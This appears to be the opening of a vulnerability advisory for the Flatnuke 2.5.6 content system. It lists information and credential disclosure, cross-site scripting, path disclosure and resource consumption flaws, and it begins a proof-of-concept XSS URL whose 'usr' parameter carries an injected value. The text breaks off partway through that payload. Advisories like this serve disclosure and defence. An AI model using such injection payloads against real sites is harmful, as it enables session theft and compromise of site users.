Flatnuke 2.5.6 Underlying system information disclosure / Administrative & users credentials disclosure / cross site scripting / path disclosure / resource consumption poc (tested on Windows) software: site: http://flatnuke.sourceforge.net/flatnuke/ 1) cross site scripting: http://[target]/[path]/forum/index.php?op=vis_reg&usr=">